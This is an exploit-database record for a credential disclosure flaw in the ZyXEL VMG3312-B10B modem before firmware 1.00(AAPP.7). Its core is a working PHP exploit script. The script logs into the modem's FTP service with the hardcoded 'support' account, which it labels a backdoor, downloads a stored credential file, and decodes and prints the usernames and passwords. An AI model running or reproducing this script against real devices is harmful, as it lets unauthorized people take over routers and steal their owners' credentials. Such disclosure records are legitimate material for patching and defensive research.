ID
VAR-E-201810-0436
TITLE
ZyXEL VMG3312-B10B Credential Disclosure
Trust: 0.5
DESCRIPTION
ZyXEL VMG3312-B10B versions prior to 1.00 (AAPP.7) suffer from a credential disclosure vulnerability.
Trust: 0.5
AFFECTED PRODUCTS
vendor: | zyxel | model: | vmg3312-b10b | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
# Exploit Title: ZyXEL VMG3312-B10B - Leak Credentials < 1.00(AAPP.7)
# Date: 2018-10-28
# Exploit Author: numan tA1/4rle @numanturle
# Vendor Homepage: https://www.zyxel.com/
# Software Link: ftp://ftp.zyxel.com.tr/ZyXEL_URUNLERI/MODEMLER/VDSL_MODEMLER/VMG3312-B10B/
# Firmware: 1.00(AAPP.0)D7
# Tested on: windows
# Fixed firmware: 1.00(AAPP.7)
<?php
$ftp_server = "192.168.1.1"; // modem ip address
$ftp_conn = ftp_connect($ftp_server) or die("ftp server close");
$login = ftp_login($ftp_conn, "support", "support"); // backdoor
$local_file = "crackme";
$server_file = "/var/csamu"; // base64_encode files
if (ftp_get($ftp_conn, $local_file, $server_file, FTP_BINARY)) {
$open = file($local_file);
foreach($open as $u_p){
$bomb = explode(" ",$u_p);
$user = $bomb[0];
$pass = base64_decode($bomb[1]);
if(!empty($pass)){
echo "{$user}:{$pass}<br>";
}else {
continue;
}
}
}else {
echo "pfff";
}
ftp_close($ftp_conn);
?>
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TYPE
info disclosure
Trust: 0.5
TAGS
tag: | exploit | Trust: 0.5 |
tag: | info disclosure | Trust: 0.5 |
CREDITS
numan turle
Trust: 0.5
EXTERNAL IDS
db: | PACKETSTORM | id: | 150031 | Trust: 0.5 |
SOURCES
db: | PACKETSTORM | id: | 150031 |
LAST UPDATE DATE
2022-07-27T09:11:19.029000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 150031 | date: | 2018-10-30T18:32:22 |